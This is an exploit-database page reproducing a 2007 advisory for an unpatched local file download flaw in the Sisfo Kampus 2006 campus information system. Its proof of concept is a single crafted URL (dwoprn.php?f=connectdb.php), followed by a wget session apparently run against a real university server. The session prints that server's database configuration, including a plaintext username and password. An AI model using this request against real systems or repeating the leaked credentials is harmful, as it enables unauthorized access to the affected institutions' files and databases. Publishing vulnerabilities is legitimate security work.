Sisfo Kampus 2006 Local File Downloaded Vulnerability

vendor:

by:

k-one A.K.A PUPET

5.5

CVSS

MEDIUM

Local File Download

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Sisfo Kampus 2006 Local File Downloaded Vulnerability

This vulnerability allows an attacker to download any local file from the vulnerable system. The exploit involves sending a specific HTTP request with the file path to the target system, which then responds with the requested file.

Mitigation:

The vendor has not been contacted yet, so there is no official mitigation available. However, users can protect themselves by ensuring their systems are up to date with the latest security patches and by implementing strong access controls to prevent unauthorized access to sensitive files.

Source

Exploit-DB raw data:

original File name : PUPET-SisfoKampus2006.txt

date releases      : September 10, 2007

 

Information :

=========================

Advisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability

Author: k-one A.K.A PUPET

Website vendor : http://sisfokampus.net/

Problem : All Local File can downloaded


POC :

=========================

 

http://[h0sT]/[dir]/dwoprn.php?f=connectdb.php

 

 

[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php

--07:30:16--  http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php

           => `dwoprn.php?f=connectdb.php'

Resolving ***.*****-subang.ac.id... 203.130.***.**

Connecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 292 [application/dwoprn]

 

100%[====================================================================================================================================================================>] 292           --.--K/s

 

07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]

 

[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php

<?php

  // file: connectdb.php

  // author: E. Setio Dewo, Maret 2003

 

  $db_username = "t26924_siak";

  $db_hostname = "localhost";

  $db_password = "siakang";

  $db_name = "t26924_siak";

 

  $con = _connect($db_hostname, $db_username, $db_password);

  $db  = _select_db($db_name, $con);

 

?>

Vendor Response:

==============

Not contacted yet

 

Patch :

=============

No Patch Available

This bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)

# milw0rm.com [2007-09-10]